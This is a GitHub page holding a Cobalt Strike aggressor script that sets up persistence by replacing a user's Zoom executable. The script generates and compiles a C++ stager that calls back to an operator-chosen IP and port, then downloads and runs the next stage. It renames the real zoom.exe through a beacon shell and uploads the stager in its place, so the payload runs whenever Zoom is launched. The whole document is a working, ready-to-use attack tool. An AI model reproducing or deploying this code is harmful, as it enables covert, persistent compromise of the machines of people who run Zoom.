-
Notifications
You must be signed in to change notification settings - Fork 11
/
Copy pathZoomPersistence.cna
157 lines (113 loc) · 4.43 KB
/
ZoomPersistence.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
# ###################################
#
# Zoom Persistence via Symlink Abuse (S4R1N)
#
# Background: By default Zoom gets installed under a User's "AppData" directory
# (C:\Users\{USER}\AppData\Roaming\Zoom\) which is writeable by the user in question
# if the Zoom executable located in the the Zoom "bin" directory gets replaced with
# another one. All the Symbolic links (short cuts) will point to this new exe.
#
# Functionality: This script generates a C++ stager using the operator provided arguments
# (Compilation is currently handled by mingw and generates a 32bit exe). The script then
# renames the zoom executable on the filesystem to a user-defined name and uploads the
# stager to the zoom directory under the file name "zoom.exe".
#
# This stager will then run the Zoom Executable using its modified name and then pull the
# stage from the specified address and execute it.
#
# IMPORTANT: Modify the builder and compiler variables to point at the correct builder
# and compiler executable names
#
# Example Usage : zoomer 127.0.0.1 80 test
#
####################################
# Config:
# Modify this as needed
$sourceDir = "C:\\Users\\S4R1N\\source\\repos\\ZoomPersistence\\Source\\";
$outputDir = "C:\\Users\\S4R1N\\source\\repos\\ZoomPersistence\\Output\\";
$template_file = "template.txt";
$compiler = "mingw32-c++.exe";
# DO NOT change this. This whole technique relies on this.
$output_file = "zoom.exe";
alias zoomer {
# Get Number of Args
$size = size(@_);
# check size
if ($size != 5 ) {
berror($1, "Usage: zoomer <IP> <PORT> <FILE> <NEW_ZOOM_NAME>");
} else {
# Splitting Arg Array to Respective Variables
$IP = @_[1];
$PORT = @_[2];
$FILE = @_[3];
$ZOOMEXE = @_[4];
# String Concatination via . Operator
$URL = "http://" . "$IP" . ":" . "$PORT" . "/" . "$FILE";
$STAGER = "$sourceDir" . "$IP" . "_" . "$PORT" . "_" . "$FILE" . ".cpp";
# Creating Some Vars for Later User
$user = beacon_info($1, "user");
$zd = "c:\\\\users\\\\" . "$user" . "\\\\AppData\\\\Roaming\\\\Zoom\\\\bin\\\\";
$zn = "$zd" . "$ZOOMEXE";
# DEBUG
blog($1,"Building Stager to fetch from $URL");
createNewFile("$STAGER");
$sourcetext = genSource($IP, $PORT, $FILE, $zn);
fileWriter($STAGER, $sourcetext);
blog($1,"Created New Stager Source $STAGER");
# Preparing Compilation
# Modify as Needed
$exe = "$outputDir" . "$output_file";
blog($1,"Attempting to Compile Stager");
@command = @("$compiler", "-w", "-o", "$exe", "$STAGER", "-l", "wininet");
$hProcess = exec(@command, $null, $compilerDirectory);
#Wait for command to finish
$retcode = wait($hProcess, 0);
if ($retcode == 0){
#info for payload delivery
$zoomdir = "c:\\users\\" . "$user" . "\\AppData\\Roaming\\Zoom\\bin\\";
$zoom = "$zoomdir" . "zoom.exe";
$zoomnew = "$zoomdir" . "$ZOOMEXE";
blog($1,"Return Code From Compiler: $retcode");
blog($1, "Renaming Zoom Client For $user \($zoom\) to $ZOOMEXE \($zoomnew\)");
bshell($1,"rename $zoom $ZOOMEXE");
# Reading Bytes to Upload
$file = openf("$exe");
$data = readb($file, -1);
# upload binary
bupload_raw($1, "$zoom", "$data");
# Close handle to file
closef($exe);
} else {
berror($1, "ERROR Compiling Payload\cF")
}
}
}
sub genSource
{
# Usage genSource($ip, $port, $file, $zoomexe);
$IP = $1;
$PORT = $2;
$FILE = $3;
$ZOOMDEF = $4;
# adding global vars
$src = "#define CALLBACK_SERVER \"$IP\"\n" . "#define CALLBACK_PORT $PORT\n" . "#define CALLBACK_ENDPOINT \"$FILE\"\n" . "#define ZOOMNAME \"$ZOOMDEF\"\n";
#open file as read-only
$tempf = "$sourceDir" . "$template_file";
blog($1,"Attempting to read template file \($tempf\)");
$file = openf("$tempf");
# read data and append to prexisting source
while $read(readln($file)) {
$src = "$src" . "$read" . "\n";
}
closef("tempf");
return $src;
}
sub fileWriter
{
$file = $1;
$source = $2;
# Open file Overwriting Content
$hFile = openf(">$1");
println($hFile, "$source");
closef("hFile");
}